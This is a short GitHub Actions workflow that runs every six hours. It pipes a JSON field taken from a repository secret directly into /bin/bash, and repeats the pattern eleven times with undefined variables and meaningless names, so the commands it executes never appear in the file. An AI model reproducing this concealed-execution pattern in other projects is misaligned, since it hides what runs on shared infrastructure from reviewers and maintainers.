name: tongyixoa

on:
  workflow_dispatch:
  schedule:
    - cron: '9 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tongyixoa
        env:
          fanjz83: ${{ secrets.fanjz83 }}
        run: |
          echo $fanjz83 | jq -r .ahwy71047 | /bin/bash
          echo $vmbr2575 | jq -r .bh10 | /bin/bash
          echo $vbt56339 | jq -r .e099 | /bin/bash
          echo $hmsz16 | jq -r .ruywb3681 | /bin/bash
          echo $dwiq49213 | jq -r .txwwy0 | /bin/bash
          echo $lj48 | jq -r .ixzqf253 | /bin/bash
          echo $qh24168 | jq -r .wwuuh12 | /bin/bash
          echo $vdb7 | jq -r .ude055 | /bin/bash
          echo $swpe4406 | jq -r .yg10 | /bin/bash
          echo $e80 | jq -r .hdq5 | /bin/bash
          echo $w9 | jq -r .nc68 | /bin/bash
          echo $sqhk319 | jq -r .voi0 | /bin/bash

